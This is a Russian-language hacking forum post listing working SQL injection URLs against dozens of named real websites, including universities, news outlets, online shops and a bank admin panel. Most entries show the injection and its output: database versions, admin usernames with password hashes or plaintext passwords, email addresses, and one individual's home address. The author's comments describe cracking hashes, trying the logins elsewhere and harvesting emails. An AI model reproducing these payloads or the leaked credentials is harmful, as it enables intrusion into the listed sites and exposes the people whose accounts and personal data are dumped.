SQL Инъекции

http://www.coreyholms.com/portfolio/project.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9/*

4.1.20/coreyholms_db1/coreyholms@localhost
-----------------------------------------------------------------------------
taylormarsh.com

http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9/*

4.1.20/taylormarsh/taylormarsh@localhost


http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,username,password,email),8,9+from+users/*

логин/хеш/мейл
tmarsh/959b43c9d1b14f6281eceea6e1762370/[email protected]

 

koreateacher.com

Code:

http://www.koreateacher.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

5.0.45koreateacher@localhostkoreateacher

Code:

http://www.koreateacher.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,id),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mos_users/*

turk_the_ripperf653d1fcff57e27242cd72ba6171202562
http://koreateacher.com/administrator/index.php

riac.ca

Code:

http://riac.ca/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users/*

5.0.33-standard-mpbriac_joom1@localhostriac_joom1

Code:

http://riac.ca/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users/*

admin28b84c0788be703904d31af1027553fa[email protected]
http://riac.ca/administrator/index.php

israeltown.com

Code:

http://www.israeltown.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),database()),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

4.1.22-standardisraelto_mambo@localhostisraelto_mambodb

Code:

http://www.israeltown.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mos_users/*

admin0e17fe383fffa9118672142fc5033cdc[email protected]
http://www.israeltown.com/administrator/index.php

 

phpbb forum

 

kunzweiler-international.com

Code:

http://www.kunzweiler-international.com/print.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3/*

4.0.27-log : DB168348 : [email protected]

horizons.gamersinfo.net

Code:

http://horizons.gamersinfo.net/guides/default.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6,7,8/*

4.1.15-Debian_1ubuntu5-log:gamers_horizons:[email protected]

DifusionJuridica.es

Code:

http://www.difusionjuridica.es/HTML/bar/default.php?id=-1+union+select+null,version(),null--

PostgreSQL 8.1.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)

Здесь все табы:

Code:

http://www.difusionjuridica.es/HTML/bar/default.php?id=-1+union+select+null,TABLE_NAME,null+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+184+OFFSET+1--

Кому интересно - посмотрит поля сам...

 

5.0.45-log
admin:lifevfcnth
-----------------------------------------------------

табл с пассами нету ((
-----------------------------------------------------

[email protected]:dab4b2d3a9e56590b9d54e6ab2d252ea:ge1954
http://www.ctdlock.ru/admin
пасс не подошёл - а может логин ((
-----------------------------------------------------

http://michinokubank.ru/admin
FalinA:FalinA

 

http://www.hpol.org/transcript.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user())/*

5.0.27/hpol/ro@localhost
-----------------------------------------------------------------------------

http://aboen.or.id/blog/index.php?more&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/*

4.1.22-standard/aboen_simple/aboen_aboen@localhost
-----------------------------------------------------------------------------

http://www.cantonrep.com/index.php?ID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/*

4.1.12/cantonrep01/therep_01@localhost
-----------------------------------------------------------------------------
philadelphiaweekly.com


http://www.philadelphiaweekly.com/view.php?id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),4,5/*

4.1.12-standard/philly_review_db/philly_review@rp1


http://www.philadelphiaweekly.com/view.php?id=-1+union+select+concat_ws(0x2F,uname,pword,email,fname,lname,address,city,state),2,3,4,5+from+users+limit+1,1/*

логин/пароль/мейл/first name/last name/адрес/город/штат
mcobb/tango/[email protected]/Mishel/Cobb/501 N. 32nd Street/Philadelphia/PA

Гыгыгы ..

 

Code:

http://www.culturagalega.org/temadia.php?id=-1+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14/*

Admin@localhost:cultura:5.0.27-log

Code:

http://www.justlikehiphop.com/fichemenu.php?id=-1+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

4.0.25-standard-log:[email protected]:justlikejlhh

Code:

http://www.francparler.com/syntagme.php?id=-242+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

[email protected]:francparv2_new:4.0.25-standard-log

Code:

http://www.competencemicro.com/booklet.php?id=-170+union+select+1,2,concat(version(),0x3a,user(),0x3a,database())/*

4.0.20-standard:competencemicro@localhost:database

 

Code:

http://www.emap.usask.ca/news/read.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10/*

emap@localhost:5.0.22:emap

Code:

http://www.rfidupdate.com/articles/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15/*

rfidup2_tester1@localhost:5.0.27-standard:rfidup2_rfidupdate

 

Code:

http://www.alparysoft.ru/products.php?id=10&item=99999999+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23/*
http://referat.com.ua/referat_show.php?id=-999999'+union+select+concat(version(),0x3a,user()),2,3,4,database(),6,7/*

 

http://www.artistportfolio.net/index.php?secret=140&artist_id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),4/*

4.1.11-Debian_4sarge8-log/ap/ap@localhost

-----------------------------------------------------------------------------

http://www.nyla.org/index.php?page_id=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1/*

4.1.18-log/nyla/katm9t5s@localhost


http://www.nyla.org/index.php?page_id=-1'+union+select+1,2,3,4,concat_ws(0x2F,name,password),6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+users+limit+0,1/*

имя/пароль
deputydir252/huds0n

 

tmaxclub.it

Code:

http://www.tmaxclub.it/index.php?page=-1%20union+select+1,2,3,4,5,concat_ws(0x3,version(),user(),database())/*

4.0.20a-nttmaxclub@localhosttmaxclub

Code:

http://www.tmaxclub.it/index.php?page=-1%20union+select+1,2,3,4,5,concat_ws(0x3,username,user_password,user_email,user_icq)+from+phpbb_users+where+user_id=5/*

Pol4fd1981a0ccfb891136e011c4aa1f799[email protected] (это админ сайта)

 

http://www.lawfirm.ee/image_view.php?img_id=-1+union+select+1,concat_ws(0x2F,version(),database(),user())/*

4.1.22/d13410sd10549/[email protected]
-----------------------------------------------------------------------------

http://www.arcade-history.com/index.php?page=detail&id=-1+union+select+concat_ws(0x2F,version(),database(),user()),2/*

5.0.45-log/arcade-historycom/[email protected]
-----------------------------------------------------------------------------

http://mobile.jlaudio.com/multimedia_pages.php?page_id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4/*

4.0.23-nt/jlaudio/jldbuser@localhost


http://mobile.jlaudio.com/multimedia_pages.php?page_id=-1+union+select+1,2,concat_ws(0x2F,username,password),4+from+users/*

логин/пароль
admin/m@n@ge

 

Code:

http://www.culturefemme.com/actualites/detail.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6/*

5.0.44-log
отсюда

Code:

http://www.culturefemme.com/actualites/detail.php?id=-1+union+select+1,concat(admin_login,0x3a,admin_pwd),3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+culturefclf.newslet_admin/*

всего 1 юзвер afroqueen:d0a22f9bf34b1a398e90136ec03a9f19
мб это и есть админ, хеш кинул на разшифровку =)

Code:

http://www.scenenationale61.com/detail_spectacles.php?id=-97+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7/*

4.0.25-standard-log:[email protected]:scenenatsnaf

Code:

http://www.presencemusulmane.org/publication_view.php?id=-34+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,0,1,2/*

4.0.27-max-log:[email protected]:db152695
со 2й попытки подобрал название

Code:

http://www.presencemusulmane.org/publication_view.php?id=-34+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,0,1,2+from+users/*

presencemusulmane:!Islam2006***
presencemusulmaneottawa:!Ottawa2006*
к фтп оба не подходят =(

 

Code:

http://www.fartingpreacher.org/index.php?action=showpic&cat=9999999&pic=9999999&pic=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.stopmoshorts.com/gallery/index.php?action=showpic&cat=9999999&pic=9999999&pic=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

 

edu

Code:

http://complit.princeton.edu/index.php?app=people&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,aes_decrypt(aes_encrypt(version(),0x41),0x41),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
http://www.hudson.edu/list.php?id=-536+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x41),0x41),4,5,6/*
http://wellness.byu.edu/cat.php?id=-3'+union+select+1,2,3,4,version(),6,7,8/*
http://telecom.colorado.edu/index.php?load=content&page_id=-79+union+select+1,2,3,4,version(),6,7,8,9,10/*
http://www.calnorthern.edu/index.php?action=schedule&f_id=18+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x41),0x41),6,7,8,9,10,11,12,13,14,15/*
http://www.adison.edu/jobs_careers.php?cat_id=-3391+union+select+version(),2,3,4/*
http://www.nassonu.edu/show_cat.php?cat_id=-53+union+select+version(),2,3,4/*
http://www.peel.edu/website-resources.php?cat_id=-13580+union+select+version(),2,3,4/*

 

Магазин Октава (Музыкальное оборудование)

Code:

http://www.oktava-shop.com/view_prod.php?id=999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14/*

 

cural.ru - Мультимедиа-группа КСК - ведущий российский разработчик
комплексных презентационных решений.

Code:

http://www.cural.ru/core.php?p=283&nag=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/*

5.0.45-log:cural:csc@localhost

На клиентов этой медиа-группы стоит взглянуть!!!:

Code:

http://www.cural.ru/core.php?p=2

 

http://www.mostiko.com/index.php?page=artist&view=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4/*

4.0.24_Debian-10-log/mostiko/mostiko@localhost
----------------------------------------------------------------------------

http://pray4exeter.clearthought.co.uk/dispArt.php?art=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9/*

5.0.45-community/web17-pray4exete/web17-pray4exete@localhost
----------------------------------------------------------------------------

http://www.fairvote.org/index.php?page=200&articlemode=showspecific&showarticle=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/*

5.0.45-community/fairvote_gonearethedays/fairvote_rsquare@localhost
----------------------------------------------------------------------------
tangodiva.com

http://www.tangodiva.com/index.php?page=features&j=1&cat=1&story_id=-1+union+select+concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/*

4.1.20/tangodiv tangodiva/tangodiv@localhost


http://www.tangodiva.com/index.php?page=features&j=1&cat=1&story_id=-1+union+select+concat_ws(0x2F,username,password,email)+from+td_users+limit+3300,1/*

логин/пароль/мейл
samgrinter/lyn2370/[email protected]

 

вооо берем парсер мыльников и парсим базу и получаем на ваыходе крутую штуку блин =)))

 

Code:

http://shinza.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://irisgift.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8,9+from+customers/*
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

Подробности тут: https://forum.antichat.ru/showpost.php?p=586483&postcount=59